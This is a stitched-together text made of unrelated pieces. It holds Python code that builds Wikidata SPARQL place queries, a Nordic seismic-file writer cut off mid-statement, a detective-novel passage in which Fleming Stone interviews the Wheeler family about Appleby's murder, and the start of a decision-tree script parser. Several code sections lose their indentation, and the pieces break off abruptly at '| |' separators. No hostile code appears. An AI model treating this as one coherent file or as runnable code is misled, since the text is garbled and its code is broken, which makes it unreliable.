(wd:Q34442,wd:Q12042110,wd:Q124757,wd:Q79007,wd:Q18340514,wd:Q537127,wd:Q1311958,wd:Q124757,
wd:Q25917154, wd:Q1243306, wd:Q1570262, wd:Q811683,
wd:Q744913, wd:Q186117, wd:Q3298291) )
}
GROUP BY ?place ?placeLabel ?wikipediaUrl ?placeDescription ?architecturalStyleLabel ?subsidiaryLabel ?useLabel ?hasPartLabel
"""
def create_query_from_region(region: Region) -> str:
  """Build the basic place SPARQL query for a region's bounding box."""
  return create_query(region.corner_sw, region.corner_ne)
def create_query(corner_west: Point, corner_east: Point) -> str:
  """Build a SPARQL query returning places inside a bounding box.

  Two UNION branches: one for places with a P31 (instance-of) statement and
  one without, so places lacking P31 are still returned.  Only the corner
  coordinates are interpolated via f-strings.
  """
  return """
SELECT ?place ?placeLabel ?wikipediaUrl
( GROUP_CONCAT ( DISTINCT ?instanceLabel; separator="; " ) AS ?instance )
(GROUP_CONCAT(DISTINCT?location;separator=", ") AS ?point)
WHERE
{
{
?place wdt:P31 ?instance.
?wikipediaUrl schema:about ?place.
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
?instance rdfs:label ?instanceLabel. filter(lang(?instanceLabel) = "en").
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
FILTER (?instance not in
(wd:Q34442,wd:Q12042110,wd:Q124757,wd:Q79007,wd:Q18340514,wd:Q537127,wd:Q1311958,wd:Q124757,
wd:Q25917154, wd:Q1243306, wd:Q1570262, wd:Q811683,
wd:Q744913, wd:Q186117, wd:Q3298291) )
}
UNION
{
?wikipediaUrl schema:about ?place.
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
}
SERVICE wikibase:label { bd:serviceParam wikibase:language "[AUTO_LANGUAGE],en". }
}
GROUP BY ?place ?placeLabel ?wikipediaUrl
"""
def create_relation_query_from_region(region: Region) -> str:
  """Build the relations SPARQL query for a region's bounding box."""
  return create_relation_query(region.corner_sw, region.corner_ne)
def create_relation_query(corner_west: Point, corner_east: Point) -> str:
  """Build a SPARQL query returning selected relations of places in a box.

  NOTE: the returned text still contains a literal ``%s`` placeholder; the
  caller is expected to %-format in a FILTER clause (see
  ``get_filter_string``) before sending the query.  The ``# SERVICE`` line
  inside the string is a SPARQL comment, not Python.
  """
  return """
SELECT ?place ?placeLabel ?p ?propLabel ?instance ?instanceLabel
WHERE
{
{
?place ?p ?instance.
FILTER (?p IN (wdt:P31,
wdt:P5353,
wdt:P2012,
wdt:P361,
wdt:P149,
wdt:P84,
wdt:P138,
wdt:P112,
wdt:P1435,
wdt:P1640,
wdt:P463,
wdt:P355,
wdt:P527,
wdt:P140) )
%s
# SERVICE wikibase:label { bd:serviceParam wikibase:language "en". }
?prop wikibase:directClaim ?p .
?wikipediaUrl schema:about ?place.
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
SERVICE wikibase:label { bd:serviceParam wikibase:language "[AUTO_LANGUAGE],en". }
?instance rdfs:label ?instanceLabel. filter(lang(?instanceLabel) = "en").
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
}
FILTER (?instance not in
(wd:Q34442,wd:Q12042110,wd:Q124757,wd:Q79007,wd:Q18340514,wd:Q537127,wd:Q1311958,wd:Q124757,
wd:Q25917154, wd:Q1243306, wd:Q1570262, wd:Q811683,
wd:Q744913, wd:Q186117, wd:Q3298291) )
}
"""
# Query template returning only the coordinate location for one entity;
# %-formatted with a single QID (e.g. "Q60").
_BY_QID_QUERY_LOCATION_ONLY = """SELECT ?place
(GROUP_CONCAT(DISTINCT?location;separator=", ") AS ?point)
WHERE
{
VALUES ?place {wd:%s}
?place wdt:P625 ?location .
?wikipediaUrl schema:about ?place.
}
GROUP BY ?place
"""

# Full query template for one entity: location plus labels, instance-of and
# English Wikipedia URL; %-formatted with a single QID.  May return nothing
# for places whose labels are not in English (see caller docstring).
_BY_QID_QUERY = """SELECT ?place ?placeLabel ?wikipediaUrl
( GROUP_CONCAT ( DISTINCT ?instanceLabel; separator="; " ) AS ?instance )
(GROUP_CONCAT(DISTINCT?location;separator=", ") AS ?point)
WHERE
{
{
VALUES ?place {wd:%s}
?place wdt:P31 ?instance.
?place wdt:P625 ?location .
?wikipediaUrl schema:about ?place.
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
SERVICE wikibase:label { bd:serviceParam wikibase:language "[AUTO_LANGUAGE],en". }
?instance rdfs:label ?instanceLabel. filter(lang(?instanceLabel) = "en").
}
}
GROUP BY ?place ?placeLabel ?wikipediaUrl
"""
def create_location_query_from_region(region: Region) -> str:
  """Build the location-only SPARQL query for a region's bounding box."""
  return create_location_query(region.corner_sw, region.corner_ne)
def create_location_query(corner_west: Point, corner_east: Point) -> str:
  """Build a SPARQL query returning place/location pairs in a bounding box.

  NOTE: the returned text still contains a literal ``%s`` placeholder for an
  optional FILTER clause; callers %-format it (possibly with an empty
  string) before sending the query.
  """
  return """
SELECT ?place ?location
WHERE
{
{
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
%s
}
}
"""
def get_geofenced_info_wikidata_items(region: Region) -> List[Dict[Text, Any]]:
  '''Get Wikidata items with extensive information for a specific area.

  Arguments:
    region(Region): The area to query the Wikidata items.
  Returns:
    The Wikidata items with extensive information found in the area.
  '''
  candidates = query_api(create_info_query_from_region(region))
  # The wikibase:box service searches a bounding rectangle, so drop any
  # hit whose coordinates fall outside the region's actual polygon.
  return [
      item for item in candidates
      if region.polygon.contains(
          util.point_str_to_shapely_point(item['point']['value']))
  ]
def get_geofenced_wikidata_items(region: Region) -> Sequence[Dict[Text, Any]]:
  '''Get Wikidata items for a specific area.

  Arguments:
    region(Region): The area to query the Wikidata items.
  Returns:
    The Wikidata items found in the area.
  '''
  candidates = query_api(create_query_from_region(region))
  # The wikibase:box service searches a bounding rectangle, so drop any
  # hit whose coordinates fall outside the region's actual polygon.
  return [
      item for item in candidates
      if region.polygon.contains(
          util.point_str_to_shapely_point(item['point']['value']))
  ]
def get_filter_string(place_filter: Sequence[Text],
                      place_param: Text = "place"):
  """Get an appropriate FILTER sparql command for the input sequence.

  Arguments:
    place_filter: list of wd IDs as strings.
    place_param: the name of the parameter to filter on.
  Returns:
    filter_string: a string like "FILTER (?place IN ...)". Returns empty
    string if the input list is empty.
  """
  if not place_filter:
    return ""
  # Each QID is prefixed with "wd:" and the list is comma-joined.
  qid_list = ",".join(f"wd:{qid}" for qid in place_filter)
  return f"FILTER (?{place_param} IN ({qid_list}))"
def get_locations_by_qid(region: Region,
                         place_filter: Sequence[Text] = ()) -> Dict[Text, Any]:
  """Get a map from QID to coordinate location in a particular region.

  Arguments:
    region(Text): region to query.
    place_filter: a sequence of QIDs (e.g. ["Q123", "Q987"]) to filter the
      places. If left empty, no place filtering will happen.
  Returns:
    locations: map from QID (string) to shapely Point
  """
  # Immutable default () instead of the original mutable [] avoids the
  # shared-mutable-default-argument pitfall; an empty tuple still produces
  # an empty filter string, so behavior for callers is unchanged.
  query_result = query_api(create_location_query_from_region(region)
                           % get_filter_string(place_filter))
  locations = {}
  for result in query_result:
    # The QID is the last path component of the entity URI.
    qid = result['place']['value'].rsplit("/", 1)[1]
    locations[qid] = util.point_str_to_shapely_point(
        result['location']['value'])
  return locations
def get_geofenced_wikidata_relations(region: Region,
                                     place_filter: Sequence[Text] = (),
                                     extract_qids = False) -> pd.DataFrame:
  '''Get Wikidata relations for a specific area.

  Arguments:
    region(Region): The area to query the Wikidata items.
    place_filter: a sequence of QIDs (e.g. ["Q123", "Q987"]) to filter the
      places. If left empty, no place filtering will happen.
    extract_qids: If true, the columns place, p, and instance will hold just
      the QIDs/PIDs found in the last part of the wikidata URI.
  Returns:
    The Wikidata items, and certain relations to other Wikidata items.
    Columns:
      place: wikidata item corresponding to place within the region
      p: wikidata property extracted from the place
      instance: value of the property p
      instanceLabel: human-readable version of instance
      placeLabel: human-readable version of place
      propLabel: human-readable version of p
  '''
  # Immutable default () instead of the original mutable [] avoids the
  # shared-mutable-default-argument pitfall; behavior is unchanged.
  query_result = query_api(create_relation_query_from_region(region)
                           % get_filter_string(place_filter))
  result_df = pd.DataFrame(
      [{k: v['value'] for k, v in x.items()} for x in query_result])
  # Guard on empty results: an empty frame has no columns, so indexing the
  # extract columns would raise KeyError.
  if extract_qids and not result_df.empty:
    extract_cols = ["place", "p", "instance"]
    # Keep only the trailing QID/PID of each wikidata URI.
    result_df[extract_cols] = result_df[extract_cols].apply(
        lambda s: s.apply(lambda x: x.rsplit("/", 1)[1]))
  return result_df
def get_place_location_points_from_qid(
    qid: Text, location_only: bool = False) -> Sequence[Dict[Text, Any]]:
  '''Get lat/long point for a particular QID.

  Arguments:
    qid(Text): The qid to return point of.
    location_only: if True, the return list will only include two dicts: one
      for QID ('place') and one for the string version of a Point ('point').
      Note that if False, this may return null results for certain places
      that have non-English place/instance labels.
  Returns:
    list of SPARQLWrapper return dicts giving wikidata fields and values.
  '''
  # Pick the template, substitute the QID, and dispatch in one place.
  template = _BY_QID_QUERY_LOCATION_ONLY if location_only else _BY_QID_QUERY
  return query_api(template % qid)
def query_api(query: Text) -> Sequence[Dict[Text, Any]]:
'''Query the Wikidata API.
Arguments:
queries(Text): The list of queries to run on the Wikidata API.
Returns:
The Wikidata items found as a Dictionary of:
(1) head lables - {'vars': ['place', 'placeLabel', 'wikipediaUrl', 'point']}
(2) results- e.g., {'place': {'type': 'uri', 'value':
'http://www.wikidata....y/Q3272426'}, 'placeLabel': {'type': 'literal',
'value': 'Equitable Life Building', 'xml:lang': 'en'}, 'point': {'type':
'literal', 'value': 'Point(-74.010555555 ...708333333)'}, 'wikipediaUrl':
{'type': 'uri', 'value': 'https://en.wikipedia...Manhattan)'}}
'''
endpoint_url = "https://query.wikidata.org/sparql"
user_agent = "WDQS-example Python/%s.%s" % (
sys.version_info[0], sys.version_info[1])
sparql = SPARQLWrapper(endpoint_url, agent=user_agent)
| |
in the same
way as the events in the catalog.
"""
if not wavefiles:
wavefiles = ['DUMMY' for _i in range(len(catalog))]
with open(filename, 'w') as fout:
for event, wavfile in zip(catalog, wavefiles):
select = io.StringIO()
_write_nordic(event=event, filename=None, userid=userid,
evtype=evtype, wavefiles=wavfile,
string_io=select)
select.seek(0)
for line in select:
fout.write(line)
fout.write('\n')
def _write_nordic(event, filename, userid='OBSP', evtype='L', outdir='.',
                  wavefiles='DUMMY', explosion=False,
                  overwrite=True, string_io=None):
    """
    Write an :class:`~obspy.core.event.Event` to a nordic formatted s-file.

    :type event: :class:`~obspy.core.event.event.Event`
    :param event: A single obspy event
    :type filename: str
    :param filename:
        Filename to write to, can be None, and filename will be generated from
        the origin time in nordic format.
    :type userid: str
    :param userid: Up to 4 character user ID
    :type evtype: str
    :param evtype:
        Single character string to describe the event, either L, R or D.
    :type outdir: str
    :param outdir: Path to directory to write to
    :type wavefiles: list
    :param wavefiles: Waveforms to associate the nordic file with
    :type explosion: bool
    :param explosion:
        Note if the event is an explosion, will be marked by an E.
    :type overwrite: bool
    :param overwrite: force to overwrite old files, defaults to True
    :type string_io: io.StringIO
    :param string_io:
        If given, will write to the StringIO object in memory rather than to
        the filename.

    :returns: str: name of nordic file written

    .. note::
        Seisan can find waveforms either by their relative or absolute path, or
        by looking for the file recursively in directories within the WAV
        directory in your seisan install. Because all lines need to be less
        than 79 characters long (fortran hangover) in the s-files, you will
        need to determine whether the full-path is okay or not.
    """
    # First we need to work out what to call the s-file and open it
    # Check that user ID is the correct length
    if len(userid) != 4:
        raise NordicParsingError('%s User ID must be 4 characters long'
                                 % userid)
    # Check that outdir exists
    if not os.path.isdir(outdir):
        raise NordicParsingError('Out path does not exist, I will not '
                                 'create this: ' + outdir)
    # Check that evtype is one of L,R,D
    if evtype not in ['L', 'R', 'D']:
        raise NordicParsingError('Event type must be either L, R or D')
    if explosion:
        evtype += 'E'
    # Check that there is one event
    if isinstance(event, Catalog) and len(event) == 1:
        event = event[0]
    elif isinstance(event, Event):
        event = event
    else:
        raise NordicParsingError('Needs a single event')
    if not isinstance(wavefiles, list):
        wavefiles = [str(wavefiles)]
    # Determine name from origin time
    try:
        evtime = event.origins[0].time
    except IndexError:
        msg = ('Need at least one origin with at least an origin time')
        raise NordicParsingError(msg)
    if not evtime:
        msg = ('event has an origin, but time is not populated. ' +
               'This is required!')
        raise NordicParsingError(msg)
    # Attempt to cope with possible pre-existing files
    if not filename:
        range_list = []
        for i in range(30):  # Look +/- 30 seconds around origin time
            range_list.append(i)
            range_list.append(-1 * i)
        range_list = range_list[1:]
        for add_secs in range_list:
            sfilename = (evtime + add_secs).datetime.strftime('%d-%H%M-%S') +\
                evtype[0] + '.S' + (evtime + add_secs).\
                datetime.strftime('%Y%m')
            if not os.path.isfile(os.path.join(outdir, sfilename)):
                sfile_path = os.path.join(outdir, sfilename)
                break
            elif overwrite:
                sfile_path = os.path.join(outdir, sfilename)
                break
            else:
                raise NordicParsingError(os.path.join(outdir, sfilename) +
                                         ' already exists, will not '
                                         'overwrite')
    else:
        sfile_path = os.path.join(outdir, filename)
        sfilename = filename
    # Write the header info.
    if event.origins[0].latitude is not None:
        lat = '{0:.3f}'.format(event.origins[0].latitude)
    else:
        lat = ''
    if event.origins[0].longitude is not None:
        lon = '{0:.3f}'.format(event.origins[0].longitude)
    else:
        lon = ''
    if event.origins[0].depth is not None:
        # QuakeML stores depth in metres, nordic wants kilometres.
        depth = '{0:.1f}'.format(event.origins[0].depth / 1000)
    else:
        depth = ''
    if event.creation_info:
        try:
            agency = event.creation_info.get('agency_id')
            # If there is creation_info this may not raise an error annoyingly
            if agency is None:
                agency = ''
        except AttributeError:
            agency = ''
    else:
        agency = ''
    if len(agency) > 3:
        agency = agency[0:3]
    # Cope with differences in event uncertainty naming
    if event.origins[0].quality and event.origins[0].quality['standard_error']:
        timerms = '{0:.1f}'.format(event.origins[0].quality['standard_error'])
    else:
        timerms = '0.0'
    # Nordic header line has room for up to three magnitudes.
    conv_mags = []
    for mag_ind in range(3):
        mag_info = {}
        try:
            mag_info['mag'] = '{0:.1f}'.format(
                event.magnitudes[mag_ind].mag) or ''
            mag_info['type'] = _evmagtonor(event.magnitudes[mag_ind].
                                           magnitude_type) or ''
            if event.magnitudes[0].creation_info:
                mag_info['agency'] = event.magnitudes[mag_ind].\
                    creation_info.agency_id or ''
            else:
                mag_info['agency'] = ''
        except IndexError:
            mag_info['mag'] = ''
            mag_info['type'] = ''
            mag_info['agency'] = ''
        conv_mags.append(mag_info)
    # Work out how many stations were used
    if len(event.picks) > 0:
        stations = [pick.waveform_id.station_code for pick in event.picks]
        ksta = str(len(set(stations)))
    else:
        ksta = ''
    if not string_io:
        sfile = open(sfile_path, 'w')
    else:
        sfile = string_io
    sfile.write(' ' + str(evtime.year) + ' ' +
                str(evtime.month).rjust(2) +
                str(evtime.day).rjust(2) + ' ' +
                str(evtime.hour).rjust(2) +
                str(evtime.minute).rjust(2) + ' ' +
                str(evtime.second).rjust(2) + '.' +
                # BUG FIX: zero-pad microseconds to six digits before taking
                # the leading digit, so e.g. 5000 us renders as '0' (0.005 s)
                # rather than '5'. The previous ljust(1) was a no-op and
                # produced wrong deciseconds for microsecond < 100000.
                str(evtime.microsecond).zfill(6)[0:1] + ' ' +
                evtype.ljust(2) + lat.rjust(7) + lon.rjust(8) +
                depth.rjust(5) + agency.rjust(5) + ksta.rjust(3) +
                timerms.rjust(4) +
                conv_mags[0]['mag'].rjust(4) + conv_mags[0]['type'].rjust(1) +
                conv_mags[0]['agency'][0:3].rjust(3) +
                conv_mags[1]['mag'].rjust(4) + conv_mags[1]['type'].rjust(1) +
                conv_mags[1]['agency'][0:3].rjust(3) +
                conv_mags[2]['mag'].rjust(4) + conv_mags[2]['type'].rjust(1) +
                conv_mags[2]['agency'][0:3].rjust(3) + '1' + '\n')
    # Write line 2 of s-file
    sfile.write(' ACTION:ARG ' + str(datetime.datetime.now().year)[2:4] + '-' +
                str(datetime.datetime.now().month).zfill(2) + '-' +
                str(datetime.datetime.now().day).zfill(2) + ' ' +
                str(datetime.datetime.now().hour).zfill(2) + ':' +
                str(datetime.datetime.now().minute).zfill(2) + ' OP:' +
                userid.ljust(4) + ' STATUS:' + 'ID:'.rjust(18) +
                str(evtime.year) +
                str(evtime.month).zfill(2) +
                str(evtime.day).zfill(2) +
                str(evtime.hour).zfill(2) +
                str(evtime.minute).zfill(2) +
                str(evtime.second).zfill(2) +
                'I'.rjust(6) + '\n')
    # Write line 3 of s-file
    for wavefile in wavefiles:
        sfile.write(' ' + os.path.basename(wavefile) +
                    '6'.rjust(79 - len(os.path.basename(wavefile))) + '\n')
    # Write final line of s-file
    sfile.write(' STAT SP IPHASW D HRMM SECON CODA AMPLIT PERI AZIMU' +
                ' VELO AIN AR T<NAME> <NAME>Z7\n')
    # Now call the populate sfile function
    if len(event.picks) > 0:
        newpicks = '\n'.join(nordpick(event))
        sfile.write(newpicks + '\n')
        sfile.write('\n'.rjust(81))
    if not string_io:
        sfile.close()
        return str(sfilename)
    else:
        return
def nordpick(event):
"""
Format picks in an :class:`~obspy.core.event.event.Event` to nordic.
:type event: :class:`~obspy.core.event.event.Event`
:param event: A single obspy event.
:returns: List of String
.. note::
Currently finalweight is unsupported, nor is velocity, or
angle of incidence. This is because
:class:`~obspy.core.event.event.Event` stores slowness
in s/deg and takeoff angle, which would require computation
from the values stored in seisan. Multiple weights are also
not supported.
"""
pick_strings = []
for pick in event.picks:
if not pick.waveform_id:
msg = ('No waveform id for pick at time %s, skipping' % pick.time)
warnings.warn(msg)
continue
# Convert string to short sting
if pick.onset == 'impulsive':
impulsivity = 'I'
elif pick.onset == 'emergent':
impulsivity = 'E'
else:
impulsivity = ' '
# Convert string to short string
if pick.polarity == 'positive':
polarity = 'C'
elif pick.polarity == 'negative':
polarity = 'D'
else:
polarity = ' '
# Extract velocity: Note that horizontal slowness in quakeML is stored
# as s/deg
if pick.horizontal_slowness is not None:
# velocity = 1.0 / pick.horizontal_slowness
velocity = ' ' # Currently this conversion is unsupported.
else:
velocity = ' '
# Extract azimuth
if pick.backazimuth is not None:
azimuth = pick.backazimuth
else:
azimuth = ' '
# Extract the correct arrival info for this pick - assuming only one
# arrival per pick...
arrival = [arrival for arrival in event.origins[0].arrivals
if arrival.pick_id == pick.resource_id]
if len(arrival) > 0:
arrival = arrival[0]
# Extract weight - should be stored as 0-4, or 9 for seisan.
if arrival.time_weight is not None:
weight = int(arrival.time_weight)
else:
weight = '0'
# Extract azimuth residual
if arrival.backazimuth_residual is not None:
azimuthres = int(arrival.backazimuth_residual)
else:
azimuthres = ' '
# Extract time residual
if arrival.time_residual is not None:
timeres = arrival.time_residual
else:
timeres = ' '
# Extract distance
if arrival.distance is not None:
distance = degrees2kilometers(arrival.distance)
if distance >= 100.0:
distance = str(_int_conv(distance))
elif 10.0 < distance < 100.0:
distance = _str_conv(round(distance, 1), 1)
elif distance < 10.0:
distance = _str_conv(round(distance, 2), 2)
else:
distance = _str_conv(distance, False)
else:
distance = ' '
# Extract CAZ
if arrival.azimuth is not None:
caz = int(arrival.azimuth)
else:
caz = ' '
else:
caz = ' '
distance = ' '
timeres = ' '
azimuthres = ' '
azimuth = ' '
weight | |
it niver wud have entered me head again, savin’ your
speakin’ of it now. Why—was it the—the man that——”
“Oh, probably not. But everything I can learn is of help in discovering
the criminal and perhaps freeing your employers from suspicion.”
“And I wish that might be! To put it on the good man, now! And worse,
upon the ladies—angels, both of them!”
“You are fond of the family, then?”
“I am that! I’ve worked here for eight years, and never a cross word from
the missus or the master. As for <NAME>—she’s my darlint.”
“They’re fortunate in having you here,” said Stone, kindly. “That’s all,
now, cook, unless you can remember anything more of that person you saw.”
“Nothin’ more, sor. If I do, I’ll tell you.”
Thinking hard, Stone left her.
It was the most unusual case he had ever attempted. If he looked no
further for the murderer than the Wheeler family, he still had enough to
do in deciding which one of the three was guilty. But he yearned for
another suspect. Not a foolish phantom that went around piping, or a
perhaps imaginary prowler stalking on the piazza, but a real suspect with
a sound, plausible motive.
Though, to be sure, the Wheelers had motive enough. To be condemned to an
absurd restriction and then teased about it, was enough to make life gall
and wormwood to a sensitive man like Wheeler.
And who could say what words had passed between them at that final
interview? Perhaps Appleby had goaded him to the breaking point; perhaps
Wheeler had stood it, but his wife, descending the stairs and hearing the
men talk, had grown desperate at last; or, and Stone knew he thought this
most plausible of all, perhaps Maida, in her window-seat, had stood as
long as she could the aspersions and tauntings directed at her adored
father, and had, with a reckless disregard of consequences, silenced the
enemy forever.
Of young Allen, Stone had no slightest suspicion. To be sure, his
interests were one with the Wheeler family, and moreover, he had hoped
for a release from restrictions that would let the Wheelers go into
Massachusetts and thereby make possible his home there with Maida.
For Maida’s vow that she would never go into the state if her father
could not go, too, was, Allen knew, inviolable.
All this Stone mulled over, yet had no thought that Allen was the one he
was seeking. Also, <NAME> had testified that Allen was with him at
the fire, during the time that included the moment of shooting.
Strolling out into the gardens, the detective made his way to the great
tree, the big sycamore.
Here Fibsy joined him, and at Stone’s tacit nod of permission, the boy
sat down beside his superior on the bench under the tree.
“What’s this about the tree going to Massachusetts?” Fibsy asked, his
freckled face earnestly inquiring.
“One of old Appleby’s jokes,” Stone returned. “Doubtless made just after
a reading of ‘Macbeth.’ You know, or if you don’t, you must read it up
for yourself, there’s a scene there that hinges on Birnam Wood going to
Dunsinane. I can’t take time to tell you about it, but quite evidently it
pleased the old wag to tell Mr. Wheeler that he could go into his native
state when this great tree went there.”
“Meaning not at all, I s’pose.”
“Of course. And any human intervention was not allowed. So though Birnam
Wood _was_ brought to Dunsinane, such a trick is not permissible in his
case. However, that’s beside the point just now. Have you seen any of the
servants?”
“Some. But I got nothing. They’re willing enough to talk, but they don’t
know anything. They say I’d better tackle the ladies’ maid, a fair
Rachel. So I’m going for her. But I bet I won’t strike pay-dirt.”
“You may. Skip along, now, for here comes <NAME>, and she’s probably
looking for me.”
Fibsy departed, and Maida, looking relieved to find Stone alone, came
quickly toward him.
“You see, <NAME>,” she began, “you must _start_ straight in this
thing. And the only start possible is for you to be convinced that I
killed Mr. Appleby.”
“But you must admit, <NAME>, that I am not _too_ absurd in thinking
that though you say you did it, you are saying it to shield some one
else—some one who is near and dear to you.”
“I know you think that—but it isn’t so. How can I convince you?”
“Only by circumstantial evidence. Let me question you a bit. Where did
you get the revolver?”
“From my father’s desk drawer, where he always keeps it.”
“You are familiar with firearms?”
“My father taught me to shoot years ago. I’m not a crack shot—but that
was not necessary.”
“You premeditated the deed?”
“For some time I have felt that I wanted to kill that man.”
“Your conscience?”
“Is very active. I deliberately went against its dictates for my father’s
sake.”
“And you killed Mr. Appleby because he hounded your father in addition to
the long deprivation he had imposed on him?”
“No, not that alone. Oh, I don’t want to tell you—but, if you won’t
believe me otherwise, Mr. Stone, I will admit that I had a new motive——”
“A new one?”
“Yes, a secret that I learned only a day or so before—before Mr.
Appleby’s death.”
“The secret was Appleby’s?”
“Yes; that is, he knew it. He told it to me. If any one else should know
it, it would mean the utter ruin and desolation of the lives of my
parents, compared to which this present condition of living is Paradise
itself!”
“This is true, <NAME>?”
“Absolutely true. _Now_, do you understand why I killed him?”
CHAPTER XIII
<NAME>
Fleming Stone was deeply interested in the Appleby case.
While his logical brain could see no possible way to look save toward one
of the three Wheelers, yet his soul revolted at the thought that any one
of them was the criminal.
Stone was well aware of the fact that the least seemingly guilty often
proved to be a deep-dyed villain, yet he hesitated to think that Dan
Wheeler had killed his old enemy, and he could not believe it was a
woman’s work. He was impressed by Maida’s story, especially by the fact
that a recent development had made her more strongly desirous to be rid
of old Appleby. He wondered if it did not have something to do with young
Appleby’s desire to marry her, and determined to persuade her to confide
further in him regarding the secret she mentioned.
But first, he decided to interview <NAME>. This could not be done
offhand, so he waited a convenient season, and asked for a conference
when he felt sure it would be granted.
<NAME> received the detective in her sitting-room, and her manner
was calm and collected as she asked him to make the interview as brief as
possible.
“You are not well, <NAME>?” Stone asked, courteously.
“I am not ill, Mr. Stone, but naturally these dreadful days have upset
me, and the horror and suspense are still hanging over me. Can you not
bring matters to a crisis? Anything would be better than present
conditions!”
“If some member of your family would tell me the truth,” Stone said
frankly, “it would help a great deal. You know, <NAME>, when three
people insist on being regarded as the criminal, it’s difficult to choose
among them. Now, won’t you, at least, admit that you didn’t shoot Mr.
Appleby?”
“But I did,” and the serene eyes looked at Stone calmly.
“Can you prove it—I mean, to my satisfaction? Tell me this: where did you
get a pistol?”
“I used <NAME>’s revolver.”
“Where did you get it?”
“From the drawer in his desk, where he always keeps it.”
Stone sighed. Of course, both Maida and her mother knew where the
revolver was kept, so this was no test of their veracity as to the crime.
“When did you take it from the drawer?”
Sara Wheeler hesitated for an instant and from that, Stone knew that she
had to think before she spoke. Had she been telling the truth, he argued,
she would have answered at once.
But immediately she spoke, though with a shade of hesitation.
“I took it earlier in the day—I had it up in my own room.”
“Yes; where did you conceal it there?”
“In—in a dresser drawer.”
“And, when you heard the alarm | |
# Copyright (c) 2019. Partners HealthCare and other members of
# Forome Association
#
# Developed by <NAME> based on contributions by <NAME>,
# <NAME>, <NAME> and other members of Division of
# Genetics, Brigham and Women's Hospital
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys, ast
from hashlib import md5
from forome_tools.log_err import logException
from .code_works import normalizeCode
from .code_parse import parseCodeByPortions
#===============================================
class TreeFragment:
    """One parsed instruction of a decision-tree script.

    A fragment is a (level, type) pair plus the half-open range of source
    lines it covers, with optional payload: the underlying AST instruction,
    error info, a boolean decision, condition data/atoms, or a label name.
    """

    def __init__(self, level, tp, line_diap,
            base_instr = None, err_info = None, decision = None,
            cond_data = None, cond_atoms = None, label = None):
        self.mLevel = level
        self.mType = tp
        self.mLineDiap = line_diap
        self.mBaseInstr = base_instr
        self.mErrInfo = err_info
        self.mCondData = cond_data
        self.mDecision = decision
        # Never share a default list between fragments.
        self.mCondAtoms = [] if cond_atoms is None else cond_atoms
        self.mLabel = label

    def setLineDiap(self, base_diap, full_diap):
        # Stores alternative base/full line ranges alongside mLineDiap.
        self.mBaseLineDiap = base_diap
        self.mFullLineDiap = full_diap

    # --- plain accessors -------------------------------------------------
    def getLevel(self): return self.mLevel

    def getInstrType(self): return self.mType

    def getBaseInstr(self): return self.mBaseInstr

    def getLineDiap(self): return self.mLineDiap

    def getErrorInfo(self): return self.mErrInfo

    def getCondData(self): return self.mCondData

    def getDecision(self): return self.mDecision

    def getLabel(self): return self.mLabel

    def getCondAtoms(self): return self.mCondAtoms
#===============================================
class CondAtomInfo:
    """Holder for one condition atom: its condition data, the source
    location [line, col_from, col_to], and an optional warning/error text."""

    def __init__(self, cond_data, location, warn_msg = None):
        self.mCondData = cond_data
        self.mLoc = location
        self.mErrorMsg = warn_msg

    def setError(self, error_msg):
        # Overwrite (or set) the diagnostic message for this atom.
        self.mErrorMsg = error_msg

    def getLoc(self):
        return self.mLoc

    def getCondData(self):
        return self.mCondData

    def resetCondData(self, values):
        # In-place replacement so external references to the list stay valid.
        self.mCondData[:] = values

    def getErrorMsg(self):
        return self.mErrorMsg
#===============================================
class ParsedDTree:
def __init__(self, eval_space, dtree_code):
self.mEvalSpace = eval_space
self.mFragments = []
self.mCode = normalizeCode(dtree_code)
self.mDummyLinesReg = set()
self.mLabels = dict()
self.mFirstError = None
hash_h = md5()
code_lines = self.mCode.splitlines()
for parsed_d, err_info, line_diap in parseCodeByPortions(
code_lines, self.mDummyLinesReg):
fragments = []
if err_info is None:
assert len(parsed_d.body) == 1
self.mError = None
self.mCurLineDiap = line_diap
try:
instr_d = parsed_d.body[0]
if isinstance(instr_d, ast.Return):
fragments.append(TreeFragment(0, "Return", line_diap,
decision = self.getReturnValue(instr_d)))
elif (isinstance(instr_d, ast.Expr)
and isinstance(instr_d.value, ast.Call)):
fragments.append(self.processCall(instr_d.value,
len(self.mFragments)))
elif isinstance(instr_d, ast.If):
fragments += self.processIf(instr_d)
else:
self.errorIt(instr_d,
"Instructon must be of if-type")
for frag_h in fragments:
line_from, line_to = frag_h.getLineDiap()
for line_no in range(line_from, line_to):
if line_no not in self.mDummyLinesReg:
hash_h.update(bytes(code_lines[line_no - 1],
"utf-8"))
hash_h.update(b'\n')
except Exception as err:
if self.mError is None:
logException("Exception on parse tree code")
raise err
err_info = self.mError
if err_info is not None:
fragments = [TreeFragment(0, "Error", line_diap,
err_info = err_info)]
if self.mFirstError is None:
self.mFirstError = err_info
self.mFragments += fragments
self.mHashCode = hash_h.hexdigest()
self.mCurLineDiap = None
